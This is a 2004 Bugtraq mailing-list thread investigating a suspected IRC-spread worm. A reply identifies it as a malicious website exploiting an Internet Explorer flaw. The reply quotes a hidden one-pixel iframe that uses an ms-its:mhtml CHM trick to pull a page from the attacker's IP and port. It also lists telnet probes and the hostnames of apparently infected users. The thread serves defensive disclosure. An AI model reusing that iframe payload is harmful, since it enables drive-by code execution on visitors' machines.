Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New worm?

From: Charles Hamby <fixer () gci net>
Date: Sat, 27 Mar 2004 12:43:15 -0900
I checked out this IP, and saw the following::
<iframe src="ms-its:mhtml:file://c:\Css.MHT!http://69.157.174.169:2233//chm2.chm::/rundl.html"; length="1" height="1"></iframe>
This leads me to believe it may a malicious website setup in an attempt to exploit a flaw in IE that was discovered last month ("MSIE Unspecified File Processing Arbitrary Code Execution Vulnerability")and not a worm. You can get more info on it here: 

http://www.securityfocus.com/bid/9658/info/
Good call alerting the ISP. Hopefully they'll knock it offline pretty quick. 

Charles Hamby


Karousel wrote:


Hi,

   I think it's a new worm spreading on undernet. The worm PRIVMSG user
with an ip address and port like this (ip and port never change) :
[07:53] <C96347981> http://69.157.174.169:2233/

   If you telnet to this address, you'll get

C:\telnet 69.157.174.169 2233
GET / HTTP/1.1
HTTP/1.1 200 OK
Server: My Bitchin' IE Infector
Date: Sat Mar 27 13:22:27 2004
Content-type: text/html
Accept-Encoding: identity
Accept-ranges: bytes

<<snip content>>

Connection to host lost.
C:\

it may not be related, but telneting to port 80 will disconnect you with an
"unknown" response as soon you type a letter
C:\telnet 69.157.174.169 80
GUNKNOWN

Connection to host lost.
C:\

Each user wich sent me this address seems to had the (almost) same pattern
for nick and fullname: 1 letter followed by number. Some fullname are
followed by 11 numbers, others by 12 numbers. None of them was on any
channels at all.

C14130657 is Guest18231 () Toronto-HSE-ppp3970074 sympatico ca * E63731312752
S66185921 is ~M93079924 () pcp01044550pcs villgs01 fl comcast net *
O12647092342
C96347981 is ~O98407918 () host217-44-126-36 range217-44 btcentralplus com *
Y710488319397
M84234958 is Guest92377 () AOrleans-103-1-33-71 w81-250 abo wanadoo fr *
O58235883713
Z29553055 is Guest58875 () nwc102-194 nwconx net * E815603852272
O23413228 is Guest32361 () 062249161030 customer alfanett no * F729082226753
I65330976 is ~E89040321 () adsl-216-103-54-205 dsl lsan03 pacbell net *
C527516603470


The isp (sympatico.ca) has been notified on march 27 at 10:00 am and this
computer is still up.
Previous By Date Next
Previous By Thread Next

Current thread: